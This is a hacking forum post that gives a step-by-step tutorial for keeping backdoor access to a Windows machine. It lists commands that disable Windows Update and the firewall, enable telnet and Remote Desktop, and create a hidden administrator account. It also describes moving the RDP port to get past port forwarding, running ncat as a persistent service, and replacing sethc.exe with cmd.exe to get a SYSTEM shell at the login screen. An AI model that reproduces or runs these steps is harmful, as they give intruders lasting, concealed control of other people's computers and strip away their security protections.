Windows Remote Desktop Backdoor

Discussion in 'Network' started by Asphyxia, Oct 18, 2016.

  1. Asphyxia

    Asphyxia Web Admin Administrator Super Mod

    USEFUL LINKS FOR MAINTAINING ACCESS
    Non-Sucking Service Manager // http://nssm.cc/
    NCAT // http://nmap.org/ncat/

    TUTORIAL
    I wrote a private tutorial on this a while ago and now I'm just going to publish it because no one else had something written as to-the-point and helpful as what I had written.

    1. Run all of this shit:
    Code:
    sc config wuauserv start= disabled
    net stop wuauserv
    netsh firewall set opmode disable
    sc config tlntsvr start= auto
    net start telnet
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    net user support1 passwordA!1 /add
    net localgroup "Administrators" /add support1
    net localgroup "Users" /del support1
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v support1 /t REG_DWORD /d 0 /f
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /f
    net user support1 passwordA!1 /add --- this line creates the user with the username of support1.
    I grabbed this from: http://www.windows-commandline.com/enable-remote-desktop-command-line/

    2. Make sure the Terminal Service is running because the Terminal Server is what Remote Desktop runs as. Do this stuff:
    You need to register to view spoilers!

    3. Go ahead and try it, if it doesn't work try to reboot/restart the server and it should work or at least try stopping and starting the termservice.

    ADDITIONAL HELP
    Quote
    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp\PortNumber
    Is the location of the Remote Desktop port, if you find a program that is running on port 8080 or even port 80 and switch over the Remote Desktop port to 80/8080... this bypasses the need to port forward and since by default you can't back-connect or reverse-connect using remote desktop, this makes sense.

    Lastly, use the NSSM to make ncat listen as a system service each time the computer starts up. This makes maintaining access very easy.

    Alternatively you may be interested in enabling the Remote Desktop service, change sethc.exe inside the Windows System files to sethcbk.exe and copy cmd.exe to sethc.exe -- you will now connect to remote desktop and so long as authentication before screen view isn't enabled, you will see an ACTUAL screen with a login box. Tap shift 5 times and enjoy having a cmd window open with system level access. A simple and silly Windows fail.
     
    Last edited: Oct 18, 2016
    PixL and 0x0539 like this.

Share This Page